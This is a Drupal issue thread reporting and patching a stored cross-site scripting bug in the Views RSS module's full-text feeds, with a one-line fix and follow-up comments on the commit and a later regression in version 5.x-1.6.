If you have your RSS feeds configured to output the full text of nodes, and you use views_rss to generate an RSS feed, the feed will have the raw body content of the nodes in the feed. However, the body content ought to have input filters applied.
To reproduce, set the RSS settings to include full-text (rather than just the teaser). Then look at the default frontpage view's feed, which is at frontpage/feed. The feed's items will have been output without input filtering.
This is a security bug, because it enables stored cross-site scripting attacks. Consider, if you have a site in which users may register and submit content all without prior approval. A malicious user could submit content with malicious JavaScript (or some other malicious code), which would then be transmitted, unfiltered, via any views RSS feeds. Any user who happens to look at the feed would have the malicious code run in his browser.
The fix is trivial. The return value of node_invoke() needs to be assigned to the output object, thusly:
142c142
< node_invoke($item, 'view', $teaser, FALSE);
---
> $item = node_invoke($item, 'view', $teaser, FALSE);
-TimK
Comment | File | Size | Author |
---|---|---|---|
#1 | views_rss.module.HEAD_.patch | 570 bytes | gnassar |
Comments
Comment #1
gnassar CreditAttribution: gnassar commentedHad the same problem. TimK's patch seems to have fixed it. Nice catch!
Went ahead and made up a patch for it.
Comment #2
gnassar CreditAttribution: gnassar commentedAs a security bug, it'd be nice to get this into HEAD before the 6 freeze, I imagine, for any future branching.
Comment #3
merlinofchaos CreditAttribution: merlinofchaos commentedCommitted to -dev! Thanks!
Comment #4
(not verified) CreditAttribution: commentedComment #5
rfayAlthough the CHANGELOG.txt for views 5.x-1.6 says that this patch was applied, it was not, and this bug still exists in 5.x-1.6.
Comment #6
merlinofchaos CreditAttribution: merlinofchaos commentedComment #7
esmerel CreditAttribution: esmerel commentedAt this time, only security fixes will be made to the 5.x version of Views.